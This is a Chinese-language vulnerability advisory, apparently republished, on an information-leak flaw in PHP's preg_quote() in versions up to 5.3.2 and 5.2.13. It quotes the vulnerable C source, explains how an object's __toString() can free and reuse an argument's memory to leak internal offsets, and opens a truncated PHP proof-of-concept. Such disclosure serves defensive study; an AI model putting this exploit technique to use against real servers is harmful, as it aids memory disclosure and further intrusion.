quote()中断信息泄露漏洞

发布日期:2010-05-07
更新日期:2010-05-10

受影响系统:
PHP PHP <= 5.3.2
PHP PHP <= 5.2.13
描述:
--------------------------------------------------------------------------------
PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。

PHP的preg_quote()函数中存在信息泄露漏洞

static PHP_FUNCTION(preg_quote)
{
    ...
    /* Get the arguments and check for errors */
    if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|s", &in_str, &in_str_len,
                              &delim, &delim_len) == FAILURE) {
        return;
    }
   
    in_str_end = in_str + in_str_len;

...

if (delim && *delim) {
        delim_char = delim[0];
        quote_delim = 1;
    }
   
    /* Allocate enough memory so that even if each character
       is quoted, we won't run out of room */
    out_str = safe_emalloc(4, in_str_len, 1);
   
    /* Go through the string and quote necessary characters */
    for(p = in_str, q = out_str; p != in_str_end; p++) {
        c = *p;
        switch(c) {
            case '.':
            ...
            case '-':
                *q++ = '\';
                *q++ = c;
                break;

case '\0':
                *q++ = '\';
                *q++ = '0';
                *q++ = '0';
                *q++ = '0';
                break;

default:
                if (quote_delim && c == delim_char)
                    *q++ = '\';
                *q++ = c;
                break;
        }
    }
    *q = '\0';
   
    /* Reallocate string and return it */
    RETVAL_STRINGL(erealloc(out_str, q - out_str + 1), q - out_str, 0);

zend_parse_parameters()函数将字符串指针、长度和ineger参数拷贝到了本地变量,放松了这些变量与原始ZVAL之间的联系。问题是任何对ZVAL的修改都不会反映在本地变量上,因此任何中断都可能修改ZVAL,导致本地变量指向已释放和重新使用的内存。此外由于zend_parse_parameters()支持对象的__toString()方式,只要以preg_quote()第三个参数的形式传送对象就可以中断参数解析。由于PHP的call time pass by reference功能,之后攻击者可以从__toString()方式杀死preg_quote()的第一个参数并重新用于哈希表。这导致preg_quote()作用于哈希表的内存而不是字符串的内存,攻击者可以泄露重要的内部内存偏移。

<*来源:Stefan Esser (s.esser@ematters.de
 
  链接:
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<?php
class dummy
{
    function __toString()
    {                      
        /* now the magic */
        parse_str("xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx=1", $GLOBALS['var']);
        return "";
    }
}

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wwpyjy.html